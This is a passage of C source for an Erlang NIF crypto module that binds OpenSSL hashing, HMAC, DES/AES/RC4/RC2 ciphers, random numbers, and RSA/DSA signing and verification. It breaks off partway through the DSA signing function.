ERL_NIF_INIT(crypto,nif_funcs,load,reload,upgrade,unload)
#define MD5_CTX_LEN (sizeof(MD5_CTX))
#define MD5_LEN 16
#define MD5_LEN_96 12
#define MD4_CTX_LEN (sizeof(MD4_CTX))
#define MD4_LEN 16
#define SHA_CTX_LEN (sizeof(SHA_CTX))
#define SHA_LEN 20
#define SHA_LEN_96 12
#define HMAC_INT_LEN 64
#define HMAC_IPAD 0x36
#define HMAC_OPAD 0x5c
static ErlNifRWLock** lock_vec = NULL; /* Static locks used by openssl */
static ERL_NIF_TERM atom_true;
static ERL_NIF_TERM atom_false;
static ERL_NIF_TERM atom_sha;
static ERL_NIF_TERM atom_md5;
static ERL_NIF_TERM atom_error;
static ERL_NIF_TERM atom_rsa_pkcs1_padding;
static ERL_NIF_TERM atom_rsa_pkcs1_oaep_padding;
static ERL_NIF_TERM atom_rsa_no_padding;
static ERL_NIF_TERM atom_undefined;
static ERL_NIF_TERM atom_ok;
static ERL_NIF_TERM atom_not_prime;
static ERL_NIF_TERM atom_not_strong_prime;
static ERL_NIF_TERM atom_unable_to_check_generator;
static ERL_NIF_TERM atom_not_suitable_generator;
static ERL_NIF_TERM atom_check_failed;
static ERL_NIF_TERM atom_unknown;
static ERL_NIF_TERM atom_none;
static int is_ok_load_info(ErlNifEnv* env, ERL_NIF_TERM load_info)
{
int i;
return enif_get_int(env,load_info,&i) && i == 101;
}
static void* crypto_alloc(size_t size)
{
return enif_alloc(size);
}
static void* crypto_realloc(void* ptr, size_t size)
{
return enif_realloc(ptr, size);
}
static void crypto_free(void* ptr)
{
enif_free(ptr);
}
static int load(ErlNifEnv* env, void** priv_data, ERL_NIF_TERM load_info)
{
ErlNifSysInfo sys_info;
CRYPTO_set_mem_functions(crypto_alloc, crypto_realloc, crypto_free);
if (!is_ok_load_info(env, load_info)) {
return -1;
}
#ifdef OPENSSL_THREADS
enif_system_info(&sys_info, sizeof(sys_info));
if (sys_info.scheduler_threads > 1) {
int i;
lock_vec = enif_alloc(CRYPTO_num_locks()*sizeof(*lock_vec));
if (lock_vec==NULL) return -1;
memset(lock_vec,0,CRYPTO_num_locks()*sizeof(*lock_vec));
for (i=CRYPTO_num_locks()-1; i>=0; --i) {
lock_vec[i] = enif_rwlock_create("crypto_stat");
if (lock_vec[i]==NULL) return -1;
}
CRYPTO_set_locking_callback(locking_function);
CRYPTO_set_id_callback(id_function);
CRYPTO_set_dynlock_create_callback(dyn_create_function);
CRYPTO_set_dynlock_lock_callback(dyn_lock_function);
CRYPTO_set_dynlock_destroy_callback(dyn_destroy_function);
}
/* else no need for locks */
#endif /* OPENSSL_THREADS */
atom_true = enif_make_atom(env,"true");
atom_false = enif_make_atom(env,"false");
atom_sha = enif_make_atom(env,"sha");
atom_md5 = enif_make_atom(env,"md5");
atom_error = enif_make_atom(env,"error");
atom_rsa_pkcs1_padding = enif_make_atom(env,"rsa_pkcs1_padding");
atom_rsa_pkcs1_oaep_padding = enif_make_atom(env,"rsa_pkcs1_oaep_padding");
atom_rsa_no_padding = enif_make_atom(env,"rsa_no_padding");
atom_undefined = enif_make_atom(env,"undefined");
atom_ok = enif_make_atom(env,"ok");
atom_not_prime = enif_make_atom(env,"not_prime");
atom_not_strong_prime = enif_make_atom(env,"not_strong_prime");
atom_unable_to_check_generator = enif_make_atom(env,"unable_to_check_generator");
atom_not_suitable_generator = enif_make_atom(env,"not_suitable_generator");
atom_check_failed = enif_make_atom(env,"check_failed");
atom_unknown = enif_make_atom(env,"unknown");
atom_none = enif_make_atom(env,"none");
*priv_data = NULL;
library_refc++;
return 0;
}
static int reload(ErlNifEnv* env, void** priv_data, ERL_NIF_TERM load_info)
{
if (*priv_data != NULL) {
return -1; /* Don't know how to do that */
}
if (library_refc == 0) {
/* No support for real library upgrade. The tricky thing is to know
when to (re)set the callbacks for allocation and locking. */
return -2;
}
if (!is_ok_load_info(env, load_info)) {
return -1;
}
return 0;
}
static int upgrade(ErlNifEnv* env, void** priv_data, void** old_priv_data,
ERL_NIF_TERM load_info)
{
int i;
if (*old_priv_data != NULL) {
return -1; /* Don't know how to do that */
}
i = reload(env,priv_data,load_info);
if (i != 0) {
return i;
}
library_refc++;
return 0;
}
static void unload(ErlNifEnv* env, void* priv_data)
{
if (--library_refc <= 0) {
CRYPTO_cleanup_all_ex_data();
if (lock_vec != NULL) {
int i;
for (i=CRYPTO_num_locks()-1; i>=0; --i) {
if (lock_vec[i] != NULL) {
enif_rwlock_destroy(lock_vec[i]);
}
}
enif_free(lock_vec);
}
}
/*else NIF library still used by other (new) module code */
}
static ERL_NIF_TERM info_lib(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{
/* [{<<"OpenSSL">>,9470143,<<"OpenSSL 0.9.8k 25 Mar 2009">>}] */
static const char libname[] = "OpenSSL";
unsigned name_sz = strlen(libname);
const char* ver = SSLeay_version(SSLEAY_VERSION);
unsigned ver_sz = strlen(ver);
ERL_NIF_TERM name_term, ver_term;
memcpy(enif_make_new_binary(env, name_sz, &name_term), libname, name_sz);
memcpy(enif_make_new_binary(env, ver_sz, &ver_term), ver, ver_sz);
return enif_make_list1(env, enif_make_tuple3(env, name_term,
enif_make_int(env, SSLeay()),
ver_term));
}
static ERL_NIF_TERM md5(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Data) */
ErlNifBinary ibin;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &ibin)) {
return enif_make_badarg(env);
}
MD5((unsigned char *) ibin.data, ibin.size,
enif_make_new_binary(env,MD5_LEN, &ret));
return ret;
}
static ERL_NIF_TERM md5_init(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* () */
ERL_NIF_TERM ret;
MD5_Init((MD5_CTX *) enif_make_new_binary(env, MD5_CTX_LEN, &ret));
return ret;
}
static ERL_NIF_TERM md5_update(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Context, Data) */
MD5_CTX* new_ctx;
ErlNifBinary ctx_bin, data_bin;
ERL_NIF_TERM ret;
if (!enif_inspect_binary(env, argv[0], &ctx_bin)
|| ctx_bin.size != MD5_CTX_LEN
|| !enif_inspect_iolist_as_binary(env, argv[1], &data_bin)) {
return enif_make_badarg(env);
}
new_ctx = (MD5_CTX*) enif_make_new_binary(env,MD5_CTX_LEN, &ret);
memcpy(new_ctx, ctx_bin.data, MD5_CTX_LEN);
MD5_Update(new_ctx, data_bin.data, data_bin.size);
return ret;
}
static ERL_NIF_TERM md5_final(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Context) */
ErlNifBinary ctx_bin;
MD5_CTX ctx_clone;
ERL_NIF_TERM ret;
if (!enif_inspect_binary(env, argv[0], &ctx_bin) || ctx_bin.size != MD5_CTX_LEN) {
return enif_make_badarg(env);
}
memcpy(&ctx_clone, ctx_bin.data, MD5_CTX_LEN); /* writable */
MD5_Final(enif_make_new_binary(env, MD5_LEN, &ret), &ctx_clone);
return ret;
}
static ERL_NIF_TERM sha(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Data) */
ErlNifBinary ibin;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &ibin)) {
return enif_make_badarg(env);
}
SHA1((unsigned char *) ibin.data, ibin.size,
enif_make_new_binary(env,SHA_LEN, &ret));
return ret;
}
static ERL_NIF_TERM sha_init(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* () */
ERL_NIF_TERM ret;
SHA1_Init((SHA_CTX *) enif_make_new_binary(env, SHA_CTX_LEN, &ret));
return ret;
}
static ERL_NIF_TERM sha_update(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Context, Data) */
SHA_CTX* new_ctx;
ErlNifBinary ctx_bin, data_bin;
ERL_NIF_TERM ret;
if (!enif_inspect_binary(env, argv[0], &ctx_bin) || ctx_bin.size != SHA_CTX_LEN
|| !enif_inspect_iolist_as_binary(env, argv[1], &data_bin)) {
return enif_make_badarg(env);
}
new_ctx = (SHA_CTX*) enif_make_new_binary(env,SHA_CTX_LEN, &ret);
memcpy(new_ctx, ctx_bin.data, SHA_CTX_LEN);
SHA1_Update(new_ctx, data_bin.data, data_bin.size);
return ret;
}
static ERL_NIF_TERM sha_final(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Context) */
ErlNifBinary ctx_bin;
SHA_CTX ctx_clone;
ERL_NIF_TERM ret;
if (!enif_inspect_binary(env, argv[0], &ctx_bin) || ctx_bin.size != SHA_CTX_LEN) {
return enif_make_badarg(env);
}
memcpy(&ctx_clone, ctx_bin.data, SHA_CTX_LEN); /* writable */
SHA1_Final(enif_make_new_binary(env, SHA_LEN, &ret), &ctx_clone);
return ret;
}
static ERL_NIF_TERM md4(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Data) */
ErlNifBinary ibin;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &ibin)) {
return enif_make_badarg(env);
}
MD4((unsigned char *) ibin.data, ibin.size,
enif_make_new_binary(env,MD4_LEN, &ret));
return ret;
}
static ERL_NIF_TERM md4_init(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* () */
ERL_NIF_TERM ret;
MD4_Init((MD4_CTX *) enif_make_new_binary(env, MD4_CTX_LEN, &ret));
return ret;
}
static ERL_NIF_TERM md4_update(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Context, Data) */
MD4_CTX* new_ctx;
ErlNifBinary ctx_bin, data_bin;
ERL_NIF_TERM ret;
if (!enif_inspect_binary(env, argv[0], &ctx_bin) || ctx_bin.size != MD4_CTX_LEN
|| !enif_inspect_iolist_as_binary(env, argv[1], &data_bin)) {
return enif_make_badarg(env);
}
new_ctx = (MD4_CTX*) enif_make_new_binary(env,MD4_CTX_LEN, &ret);
memcpy(new_ctx, ctx_bin.data, MD4_CTX_LEN);
MD4_Update(new_ctx, data_bin.data, data_bin.size);
return ret;
}
static ERL_NIF_TERM md4_final(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Context) */
ErlNifBinary ctx_bin;
MD4_CTX ctx_clone;
ERL_NIF_TERM ret;
if (!enif_inspect_binary(env, argv[0], &ctx_bin) || ctx_bin.size != MD4_CTX_LEN) {
return enif_make_badarg(env);
}
memcpy(&ctx_clone, ctx_bin.data, MD4_CTX_LEN); /* writable */
MD4_Final(enif_make_new_binary(env, MD4_LEN, &ret), &ctx_clone);
return ret;
}
static ERL_NIF_TERM md5_mac_n(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, Data, MacSize) */
unsigned char hmacbuf[SHA_DIGEST_LENGTH];
ErlNifBinary key, data;
unsigned mac_sz;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key)
|| !enif_inspect_iolist_as_binary(env, argv[1], &data)
|| !enif_get_uint(env,argv[2],&mac_sz) || mac_sz > MD5_LEN) {
return enif_make_badarg(env);
}
hmac_md5(key.data, key.size, data.data, data.size, hmacbuf);
memcpy(enif_make_new_binary(env, mac_sz, &ret), hmacbuf, mac_sz);
return ret;
}
static ERL_NIF_TERM sha_mac_n(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, Data, MacSize) */
unsigned char hmacbuf[SHA_DIGEST_LENGTH];
ErlNifBinary key, data;
unsigned mac_sz;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key)
|| !enif_inspect_iolist_as_binary(env, argv[1], &data)
|| !enif_get_uint(env,argv[2],&mac_sz) || mac_sz > SHA_LEN) {
return enif_make_badarg(env);
}
hmac_sha1(key.data, key.size, data.data, data.size, hmacbuf);
memcpy(enif_make_new_binary(env, mac_sz, &ret),
hmacbuf, mac_sz);
return ret;
}
static ERL_NIF_TERM des_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, Ivec, Text, IsEncrypt) */
ErlNifBinary key, ivec, text;
DES_key_schedule schedule;
DES_cblock ivec_clone; /* writable copy */
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key) || key.size != 8
|| !enif_inspect_binary(env, argv[1], &ivec) || ivec.size != 8
|| !enif_inspect_iolist_as_binary(env, argv[2], &text)
|| text.size % 8 != 0) {
return enif_make_badarg(env);
}
memcpy(&ivec_clone, ivec.data, 8);
DES_set_key((const_DES_cblock*)key.data, &schedule);
DES_ncbc_encrypt(text.data, enif_make_new_binary(env, text.size, &ret),
text.size, &schedule, &ivec_clone, (argv[3] == atom_true));
return ret;
}
static ERL_NIF_TERM des_ecb_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, Text/Cipher, IsEncrypt) */
ErlNifBinary key, text;
DES_key_schedule schedule;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key) || key.size != 8 ||
!enif_inspect_iolist_as_binary(env, argv[1], &text) || text.size != 8) {
return enif_make_badarg(env);
}
DES_set_key((const_DES_cblock*)key.data, &schedule);
DES_ecb_encrypt((const_DES_cblock*)text.data,
(DES_cblock*)enif_make_new_binary(env, 8, &ret),
&schedule, (argv[2] == atom_true));
return ret;
}
static ERL_NIF_TERM des_ede3_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key1, Key2, Key3, IVec, Text/Cipher, IsEncrypt) */
ErlNifBinary key1, key2, key3, ivec, text;
DES_key_schedule schedule1, schedule2, schedule3;
DES_cblock ivec_clone; /* writable copy */
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key1) || key1.size != 8
|| !enif_inspect_iolist_as_binary(env, argv[1], &key2) || key2.size != 8
|| !enif_inspect_iolist_as_binary(env, argv[2], &key3) || key3.size != 8
|| !enif_inspect_binary(env, argv[3], &ivec) || ivec.size != 8
|| !enif_inspect_iolist_as_binary(env, argv[4], &text)
|| text.size % 8 != 0) {
return enif_make_badarg(env);
}
memcpy(&ivec_clone, ivec.data, 8);
DES_set_key((const_DES_cblock*)key1.data, &schedule1);
DES_set_key((const_DES_cblock*)key2.data, &schedule2);
DES_set_key((const_DES_cblock*)key3.data, &schedule3);
DES_ede3_cbc_encrypt(text.data, enif_make_new_binary(env,text.size,&ret),
text.size, &schedule1, &schedule2, &schedule3,
&ivec_clone, (argv[5] == atom_true));
return ret;
}
static ERL_NIF_TERM aes_cfb_128_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, IVec, Data, IsEncrypt) */
ErlNifBinary key, ivec, text;
AES_KEY aes_key;
unsigned char ivec_clone[16]; /* writable copy */
int new_ivlen = 0;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key) || key.size != 16
|| !enif_inspect_binary(env, argv[1], &ivec) || ivec.size != 16
|| !enif_inspect_iolist_as_binary(env, argv[2], &text)
|| text.size % 16 != 0) {
return enif_make_badarg(env);
}
memcpy(ivec_clone, ivec.data, 16);
AES_set_encrypt_key(key.data, 128, &aes_key);
AES_cfb128_encrypt((unsigned char *) text.data,
enif_make_new_binary(env, text.size, &ret),
text.size, &aes_key, ivec_clone, &new_ivlen,
(argv[3] == atom_true));
return ret;
}
/* Common for both encrypt and decrypt
*/
static ERL_NIF_TERM aes_ctr_encrypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, IVec, Data) */
ErlNifBinary key, ivec, text;
AES_KEY aes_key;
unsigned char ivec_clone[16]; /* writable copy */
unsigned char ecount_buf[AES_BLOCK_SIZE];
unsigned int num = 0;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key)
|| AES_set_encrypt_key(key.data, key.size*8, &aes_key) != 0
|| !enif_inspect_binary(env, argv[1], &ivec) || ivec.size != 16
|| !enif_inspect_iolist_as_binary(env, argv[2], &text)) {
return enif_make_badarg(env);
}
memcpy(ivec_clone, ivec.data, 16);
memset(ecount_buf, 0, sizeof(ecount_buf));
AES_ctr128_encrypt((unsigned char *) text.data,
enif_make_new_binary(env, text.size, &ret),
text.size, &aes_key, ivec_clone, ecount_buf, &num);
/* To do an incremental {en|de}cryption, the state to to keep between calls
must include ivec_clone, ecount_buf and num. */
return ret;
}
static ERL_NIF_TERM rand_bytes_1(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Bytes) */
unsigned bytes;
unsigned char* data;
ERL_NIF_TERM ret;
if (!enif_get_uint(env, argv[0], &bytes)) {
return enif_make_badarg(env);
}
data = enif_make_new_binary(env, bytes, &ret);
RAND_pseudo_bytes(data, bytes);
ERL_VALGRIND_MAKE_MEM_DEFINED(data, bytes);
return ret;
}
static ERL_NIF_TERM rand_bytes_3(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Bytes, TopMask, BottomMask) */
unsigned bytes;
unsigned char* data;
unsigned top_mask, bot_mask;
ERL_NIF_TERM ret;
if (!enif_get_uint(env, argv[0], &bytes)
|| !enif_get_uint(env, argv[1], &top_mask)
|| !enif_get_uint(env, argv[2], &bot_mask)) {
return enif_make_badarg(env);
}
data = enif_make_new_binary(env, bytes, &ret);
RAND_pseudo_bytes(data, bytes);
ERL_VALGRIND_MAKE_MEM_DEFINED(data, bytes);
if (bytes > 0) {
data[bytes-1] |= top_mask;
data[0] |= bot_mask;
}
return ret;
}
static int get_bn_from_mpint(ErlNifEnv* env, ERL_NIF_TERM term, BIGNUM** bnp)
{
ErlNifBinary bin;
int sz;
if (!enif_inspect_binary(env,term,&bin)) {
return 0;
}
ERL_VALGRIND_ASSERT_MEM_DEFINED(bin.data, bin.size);
sz = bin.size - 4;
if (sz < 0 || get_int32(bin.data) != sz) {
return 0;
}
*bnp = BN_bin2bn(bin.data+4, sz, NULL);
return 1;
}
static ERL_NIF_TERM rand_uniform_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Lo,Hi) */
BIGNUM *bn_from = NULL, *bn_to, *bn_rand;
unsigned char* data;
unsigned dlen;
ERL_NIF_TERM ret;
if (!get_bn_from_mpint(env, argv[0], &bn_from)
|| !get_bn_from_mpint(env, argv[1], &bn_rand)) {
if (bn_from) BN_free(bn_from);
return enif_make_badarg(env);
}
bn_to = BN_new();
BN_sub(bn_to, bn_rand, bn_from);
BN_pseudo_rand_range(bn_rand, bn_to);
BN_add(bn_rand, bn_rand, bn_from);
dlen = BN_num_bytes(bn_rand);
data = enif_make_new_binary(env, dlen+4, &ret);
put_int32(data, dlen);
BN_bn2bin(bn_rand, data+4);
ERL_VALGRIND_MAKE_MEM_DEFINED(data+4, dlen);
BN_free(bn_rand);
BN_free(bn_from);
BN_free(bn_to);
return ret;
}
static ERL_NIF_TERM mod_exp_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Base,Exponent,Modulo) */
BIGNUM *bn_base=NULL, *bn_exponent=NULL, *bn_modulo, *bn_result;
BN_CTX *bn_ctx;
unsigned char* ptr;
unsigned dlen;
ERL_NIF_TERM ret;
if (!get_bn_from_mpint(env, argv[0], &bn_base)
|| !get_bn_from_mpint(env, argv[1], &bn_exponent)
|| !get_bn_from_mpint(env, argv[2], &bn_modulo)) {
if (bn_base) BN_free(bn_base);
if (bn_exponent) BN_free(bn_exponent);
return enif_make_badarg(env);
}
bn_result = BN_new();
bn_ctx = BN_CTX_new();
BN_mod_exp(bn_result, bn_base, bn_exponent, bn_modulo, bn_ctx);
dlen = BN_num_bytes(bn_result);
ptr = enif_make_new_binary(env, dlen+4, &ret);
put_int32(ptr, dlen);
BN_bn2bin(bn_result, ptr+4);
BN_free(bn_result);
BN_CTX_free(bn_ctx);
BN_free(bn_modulo);
BN_free(bn_exponent);
BN_free(bn_base);
return ret;
}
static int inspect_mpint(ErlNifEnv* env, ERL_NIF_TERM term, ErlNifBinary* bin)
{
return enif_inspect_binary(env, term, bin) &&
bin->size >= 4 && get_int32(bin->data) == bin->size-4;
}
static ERL_NIF_TERM dss_verify(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (DigestType,Data,Signature,Key=[P, Q, G, Y]) */
ErlNifBinary data_bin, sign_bin;
BIGNUM *dsa_p = NULL, *dsa_q = NULL, *dsa_g = NULL, *dsa_y = NULL;
unsigned char hmacbuf[SHA_DIGEST_LENGTH];
ERL_NIF_TERM head, tail;
DSA *dsa;
int i;
if (!inspect_mpint(env, argv[2], &sign_bin)
|| !enif_get_list_cell(env, argv[3], &head, &tail)
|| !get_bn_from_mpint(env, head, &dsa_p)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &dsa_q)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &dsa_g)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &dsa_y)
|| !enif_is_empty_list(env,tail)) {
badarg:
if (dsa_p) BN_free(dsa_p);
if (dsa_q) BN_free(dsa_q);
if (dsa_g) BN_free(dsa_g);
if (dsa_y) BN_free(dsa_y);
return enif_make_badarg(env);
}
if (argv[0] == atom_sha && inspect_mpint(env, argv[1], &data_bin)) {
SHA1(data_bin.data+4, data_bin.size-4, hmacbuf);
}
else if (argv[0] == atom_none && enif_inspect_binary(env, argv[1], &data_bin)
&& data_bin.size == SHA_DIGEST_LENGTH) {
memcpy(hmacbuf, data_bin.data, SHA_DIGEST_LENGTH);
}
else {
goto badarg;
}
dsa = DSA_new();
dsa->p = dsa_p;
dsa->q = dsa_q;
dsa->g = dsa_g;
dsa->priv_key = NULL;
dsa->pub_key = dsa_y;
i = DSA_verify(0, hmacbuf, SHA_DIGEST_LENGTH,
sign_bin.data+4, sign_bin.size-4, dsa);
DSA_free(dsa);
return(i > 0) ? atom_true : atom_false;
}
static ERL_NIF_TERM rsa_verify(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Type, Data, Signature, Key=[E,N]) */
ErlNifBinary data_bin, sign_bin;
unsigned char hmacbuf[SHA_DIGEST_LENGTH];
ERL_NIF_TERM head, tail, ret;
int i, is_sha;
RSA* rsa = RSA_new();
if (argv[0] == atom_sha) is_sha = 1;
else if (argv[0] == atom_md5) is_sha = 0;
else goto badarg;
if (!inspect_mpint(env, argv[1], &data_bin)
|| !inspect_mpint(env, argv[2], &sign_bin)
|| !enif_get_list_cell(env, argv[3], &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->e)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->n)
|| !enif_is_empty_list(env, tail)) {
badarg:
ret = enif_make_badarg(env);
}
else {
if (is_sha) {
SHA1(data_bin.data+4, data_bin.size-4, hmacbuf);
i = RSA_verify(NID_sha1, hmacbuf, SHA_DIGEST_LENGTH,
sign_bin.data+4, sign_bin.size-4, rsa);
}
else {
MD5(data_bin.data+4, data_bin.size-4, hmacbuf);
i = RSA_verify(NID_md5, hmacbuf, MD5_DIGEST_LENGTH,
sign_bin.data+4, sign_bin.size-4, rsa);
}
ret = (i==1 ? atom_true : atom_false);
}
RSA_free(rsa);
return ret;
}
static ERL_NIF_TERM aes_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, IVec, Data, IsEncrypt) */
ErlNifBinary key_bin, ivec_bin, data_bin;
AES_KEY aes_key;
unsigned char ivec[16];
int i;
unsigned char* ret_ptr;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key_bin)
|| (key_bin.size != 16 && key_bin.size != 32)
|| !enif_inspect_binary(env, argv[1], &ivec_bin)
|| ivec_bin.size != 16
|| !enif_inspect_iolist_as_binary(env, argv[2], &data_bin)
|| data_bin.size % 16 != 0) {
return enif_make_badarg(env);
}
if (argv[3] == atom_true) {
i = AES_ENCRYPT;
AES_set_encrypt_key(key_bin.data, key_bin.size*8, &aes_key);
}
else {
i = AES_DECRYPT;
AES_set_decrypt_key(key_bin.data, key_bin.size*8, &aes_key);
}
ret_ptr = enif_make_new_binary(env, data_bin.size, &ret);
memcpy(ivec, ivec_bin.data, 16); /* writable copy */
AES_cbc_encrypt(data_bin.data, ret_ptr, data_bin.size, &aes_key, ivec, i);
return ret;
}
static ERL_NIF_TERM exor(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Data1, Data2) */
ErlNifBinary d1, d2;
unsigned char* ret_ptr;
int i;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env,argv[0], &d1)
|| !enif_inspect_iolist_as_binary(env,argv[1], &d2)
|| d1.size != d2.size) {
return enif_make_badarg(env);
}
ret_ptr = enif_make_new_binary(env, d1.size, &ret);
for (i=0; i<d1.size; i++) {
ret_ptr[i] = d1.data[i] ^ d2.data[i];
}
return ret;
}
static ERL_NIF_TERM rc4_encrypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, Data) */
ErlNifBinary key, data;
RC4_KEY rc4_key;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env,argv[0], &key)
|| !enif_inspect_iolist_as_binary(env,argv[1], &data)) {
return enif_make_badarg(env);
}
RC4_set_key(&rc4_key, key.size, key.data);
RC4(&rc4_key, data.size, data.data,
enif_make_new_binary(env, data.size, &ret));
return ret;
}
static ERL_NIF_TERM rc4_set_key(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key) */
ErlNifBinary key;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env,argv[0], &key)) {
return enif_make_badarg(env);
}
RC4_set_key((RC4_KEY*)enif_make_new_binary(env, sizeof(RC4_KEY), &ret),
key.size, key.data);
return ret;
}
static ERL_NIF_TERM rc4_encrypt_with_state(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (State, Data) */
ErlNifBinary state, data;
RC4_KEY* rc4_key;
ERL_NIF_TERM new_state, new_data;
if (!enif_inspect_iolist_as_binary(env,argv[0], &state)
|| state.size != sizeof(RC4_KEY)
|| !enif_inspect_iolist_as_binary(env,argv[1], &data)) {
return enif_make_badarg(env);
}
rc4_key = (RC4_KEY*)enif_make_new_binary(env, sizeof(RC4_KEY), &new_state);
memcpy(rc4_key, state.data, sizeof(RC4_KEY));
RC4(rc4_key, data.size, data.data,
enif_make_new_binary(env, data.size, &new_data));
return enif_make_tuple2(env,new_state,new_data);
}
static ERL_NIF_TERM rc2_40_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key,IVec,Data,IsEncrypt) */
ErlNifBinary key_bin, ivec_bin, data_bin;
RC2_KEY rc2_key;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key_bin)
|| key_bin.size != 5
|| !enif_inspect_binary(env, argv[1], &ivec_bin)
|| ivec_bin.size != 8
|| !enif_inspect_iolist_as_binary(env, argv[2], &data_bin)) {
return enif_make_badarg(env);
}
RC2_set_key(&rc2_key, 5, key_bin.data, 40);
RC2_cbc_encrypt(data_bin.data,
enif_make_new_binary(env, data_bin.size, &ret),
data_bin.size, &rc2_key,
ivec_bin.data,
(argv[3] == atom_true));
return ret;
}
static ERL_NIF_TERM rsa_sign_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Type,Data,Key=[E,N,D]) */
ErlNifBinary data_bin, ret_bin;
ERL_NIF_TERM head, tail;
unsigned char hmacbuf[SHA_DIGEST_LENGTH];
unsigned rsa_s_len;
RSA *rsa = RSA_new();
int i, is_sha;
if (argv[0] == atom_sha) is_sha = 1;
else if (argv[0] == atom_md5) is_sha = 0;
else goto badarg;
if (!inspect_mpint(env,argv[1],&data_bin)
|| !enif_get_list_cell(env, argv[2], &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->e)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->n)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->d)
|| !enif_is_empty_list(env,tail)) {
badarg:
RSA_free(rsa);
return enif_make_badarg(env);
}
enif_alloc_binary(RSA_size(rsa), &ret_bin);
if (is_sha) {
SHA1(data_bin.data+4, data_bin.size-4, hmacbuf);
ERL_VALGRIND_ASSERT_MEM_DEFINED(hmacbuf, SHA_DIGEST_LENGTH);
i = RSA_sign(NID_sha1, hmacbuf, SHA_DIGEST_LENGTH,
ret_bin.data, &rsa_s_len, rsa);
}
else {
MD5(data_bin.data+4, data_bin.size-4, hmacbuf);
ERL_VALGRIND_ASSERT_MEM_DEFINED(hmacbuf, MD5_DIGEST_LENGTH);
i = RSA_sign(NID_md5, hmacbuf,MD5_DIGEST_LENGTH,
ret_bin.data, &rsa_s_len, rsa);
}
RSA_free(rsa);
if (i) {
ERL_VALGRIND_MAKE_MEM_DEFINED(ret_bin.data, rsa_s_len);
if (rsa_s_len != data_bin.size) {
enif_realloc_binary(&ret_bin, rsa_s_len);
ERL_VALGRIND_ASSERT_MEM_DEFINED(ret_bin.data, rsa_s_len);
}
return enif_make_binary(env,&ret_bin);
}
else {
enif_release_binary(&ret_bin);
return atom_error;
}
}
static ERL_NIF_TERM dss_sign_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (DigesType, Data, Key=[P,Q,G,PrivKey]) */
ErlNifBinary data_bin, ret_bin;
ERL_NIF_TERM head, tail;
unsigned char hmacbuf[SHA_DIGEST_LENGTH];
unsigned int dsa_s_len;
DSA* dsa = DSA_new();
int i;
dsa->pub_key = NULL;
